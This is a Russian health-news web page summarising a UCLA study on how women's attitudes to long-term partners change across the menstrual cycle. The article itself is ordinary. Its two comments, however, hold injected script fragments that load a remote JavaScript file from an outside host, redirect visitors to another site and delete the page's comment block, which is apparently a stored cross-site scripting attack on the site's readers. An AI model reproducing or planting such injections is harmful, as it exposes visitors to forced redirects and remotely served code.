Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Настроение женщины говори...  >>  Настроение женщины говорит о ее готовности забеременеть
 
Обратная связь
 

Настроение женщины говорит о ее готовности забеременеть

Размер шрифта
12 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что в зависимости от фазы менструального цикла отношение женщины к партнеру может меняться.

Настроение женщины говорит о ее готовности забеременеть

Согласно данным предыдущих исследований, в дни, наиболее благоприятные для зачатия, женщины отдают предпочтение более сексуальным мужчинам. Однако вопрос об изменениях предпочтений при длительных отношениях с мужчиной до сих пор остается открытым. Психологи из Калифорнийского университета (Лос-Анджелес) провели исследование, целью которого была оценка подобных изменений у женщин, состоящих в длительных отношениях, в течение одного месяца. В исследовании приняли участие 65 женщин, которые заполняли специальную анкету.

Оказалось, что если женщина считает своего партнера недостаточно сексуальным, то в дни, наиболее благоприятные для зачатия, она отдаляется от него и становится более требовательной. Однако женщины, которые считают своих партнеров сексуальными, ведут себя совершенно по-другому: они, наоборот, сближаются с партнерами.

Авторы исследования считают, что полученные результаты согласуются с теорией, согласно которой женщины выбирают партнеров по двум признакам: партнер должен быть достаточно сексуальным, но в то же время он должен быть хорошим отцом для будущего ребенка. Многие мужчины сочетают в себе оба качества, поэтому у большинства женщин наблюдаются лишь незначительные изменения в отношении к мужчинам в течение менструального цикла.

Всю информацию о зачатии, беременности и родах вы можете найти в материалах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Рыбка моя – я твой глазик! Какую рыбку нельзя есть беременным!   ВИЧ и беременность. Как защититься?   Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Сифилис и беременность. Как защититься?  
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Есть ли секс во время беременности?
Проблемы, с которыми справится секс
Можно ли подгадать с беременностью?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.